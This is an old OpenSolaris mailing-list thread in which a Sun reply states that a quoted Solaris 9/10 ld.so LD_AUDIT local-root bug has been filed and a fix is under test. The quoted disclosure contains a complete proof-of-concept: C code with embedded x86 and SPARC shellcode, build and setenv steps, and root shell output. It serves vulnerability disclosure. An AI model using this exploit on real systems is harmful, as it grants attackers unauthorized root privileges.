Re: [osol-discuss] Just get this: solaris 9/10 ld.so local root shell bug

Tue, 28 Jun 2005 15:55:40 -0700 

The bug's been filed, diagnosed, and a fix is under test.

6291547

Xirui wrote:

Just get this from a forum. Any comment on this?


===============================================
ate: Tue, 28 Jun 2005 01:11:58 +0200
From: Przemyslaw Frasunek <[EMAIL PROTECTED]>
To: [email protected], [email protected]
Subject: Solaris 9/10 ld.so fun
ld.so from Solaris 9 and 10 doesn't check LD_AUDIT environment variable when 
running s[ug]id binaries, allowing to run arbitrary code with elevated
privileges. Well, I can't belive, that such trivial vulnerability exists in
modern OS...

The following PoC code was tested on:

- SunOS 5.10 Generic i86pc i386 i86pc
- SunOS 5.9 Generic_112233-12 sun4u

It does NOT work on:

SunOS 5.8 Generic_117350-02 sun4u sparc

Example on unpatched Solaris 10 (AMD64):

atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9
a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2
f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x2
4\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() {
        void (*f)();
        f = (void*)sh;
        f();
        return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)



Solaris 9 on SPARC:

$ cat dupa.c
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

int la_version() {
        void (*f)();
        f = (void*)sh;
        f();
        return 3;
}

$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)


This vulnerability was introduced by one of the recent patches for Solaris
9,
possibly 112963. Ld.so patched with 112963-08 is not vulnerable -- it does
not allow LD_AUDIT for set[ug]id binaries, but upgrading to 112963-16
definitly makes ld.so exploitable.

Up-to-date Solaris 8 boxes are also vulnerable. Solaris 10 boxes are
vulnerable, both patched and unpatched.
==================================================
This message posted from opensolaris.org
_______________________________________________
opensolaris-discuss mailing list
[EMAIL PROTECTED]


_______________________________________________
opensolaris-discuss mailing list
[EMAIL PROTECTED]

Reply via email to